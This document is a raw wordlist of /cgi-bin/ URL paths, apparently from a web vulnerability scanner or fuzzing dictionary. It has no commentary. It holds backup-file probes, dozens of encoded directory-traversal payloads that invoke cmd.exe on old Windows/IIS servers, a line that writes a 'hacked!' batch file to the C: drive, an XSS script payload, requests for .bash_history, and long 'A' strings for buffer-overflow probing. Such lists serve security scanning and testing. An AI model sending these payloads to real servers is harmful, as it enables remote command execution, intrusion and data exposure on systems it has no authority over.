/cgi-bin.lnk
/cgi-bin.log
/cgi-bin.lst
/cgi-bin.o
/cgi-bin.old
/cgi-bin.old-
/cgi-bin.old0
/cgi-bin.old1
/cgi-bin.old2
/cgi-bin.old3
/cgi-bin.old4
/cgi-bin.old5
/cgi-bin.old6
/cgi-bin.old7
/cgi-bin.old8
/cgi-bin.old9
/cgi-bin.orig
/cgi-bin.sav
/cgi-bin.save
/cgi-bin.saved
/cgi-bin.tar
/cgi-bin.temp
/cgi-bin.tgz
/cgi-bin.tmp
/cgi-bin.txt
/cgi-bin.Z
/cgi-bin.zip
/cgi-bin.~1
/cgi-bin.~bk
/cgi-bin/
/cgi-bin/ 
/cgi-bin/   
/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
/cgi-bin/%2e%2e/abyss.conf
/cgi-bin/%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot%2Eini
/cgi-bin/%bg%ae%bg%ae/%bg%ae%bg%ae/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%c0%9u%c0%9u/%c0%9u%c0%9u/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%c0%qe%c0%qe/%c0%qe%c0%qe/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/%cg%9u%cg%9u/%cg%9u%cg%9u/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%cg%ae%cg%ae/%cg%ae%cg%ae/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%cg%qe%cg%qe/%cg%qe%cg%qe/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%d0%9u%d0%9u/%d0%9u%d0%9u/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%d0%ae%d0%ae/%d0%ae%d0%ae/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%d0%qe%d0%qe/%d0%qe%d0%qe/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%dg%80%ae%dg%80%ae/%dg%80%ae%dg%80%ae/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%dg%80%qe%dg%80%qe/%dg%80%qe%dg%80%qe/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%dg%o0%9u%dg%o0%9u/%dg%o0%9u%dg%o0%9u/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%dg%o0%ae%dg%o0%ae/%dg%o0%ae%dg%o0%ae/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%dg%o0%qe%dg%o0%qe/%dg%o0%qe%dg%o0%qe/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%e0%80%9u%e0%80%9u/%e0%80%9u%e0%80%9u/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%e0%o0%9u%e0%o0%9u/%e0%o0%9u%e0%o0%9u/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%e0%o0%ae%e0%o0%ae/%e0%o0%ae%e0%o0%ae/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%e0%o0%qe%e0%o0%qe/%e0%o0%qe%e0%o0%qe/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%u0%7g%9u%e0%7g%9u/%e0%7g%9u%e0%7g%9u/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%u0%7g%ae%e0%7g%ae/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%u0%7g%qe%e0%7g%qe/%e0%7g%qe%e0%7g%qe/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%u0%80%9u%u0%80%9u/%u0%80%9u%u0%80%9u/winnt/system32/cmd.exe?/c+dir
/cgi-bin/%u0%80%ae%u0%80%ae/%u0%80%ae%u0%80%ae/winnt/system32/cmd.exe?/c+dir
/cgi-bin/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/cgi-bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/cgi-bin/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35%63../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%252f../httpodbc.dll
/cgi-bin/..%252f../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c%255c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255cwindows/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255C../..%255C../..%255C../winnt/system32/cmd.exe?/c%20dir
/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%bg%9v../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%bg%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%bg%qf../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%9v../winnt/system32/cmd.exe?/c+
/cgi-bin/..%c0%ae%c0%ae..%c0%ae%c0%ae..%c0%ae%c0%ae..%c0%ae%c0%ae..%c0%ae%c0%ae../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../win2000/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../windows/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+
/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:Or
/cgi-bin/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/..%cg%9v../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%cg%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%cg%qf../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%ch%8s../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%ch%9c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%ch%pc../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%d0%9v../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%d0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%d0%qf../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%d1%8s../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%d1%pc../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%s0%9v../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%s0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%s0%qf../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%t0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%t0%qf../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%u0025u005c..%u0025u005c..%u0025u005c..%u0025u005c..%u0025u005c../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin/../../cmd.exe?%2FC+echo+\'hacked!\'>c:\\hello.bat
/cgi-bin/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\
/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+dir+c:\\
/cgi-bin/./test.cgi
/cgi-bin/.access
/cgi-bin/.addressbook
/cgi-bin/.bashrc
/cgi-bin/.bash_history
/cgi-bin/.cobalt
/cgi-bin/.cobalt/
/cgi-bin/.cobalt/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/.cobalt/alert/service.cgi?service=
/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA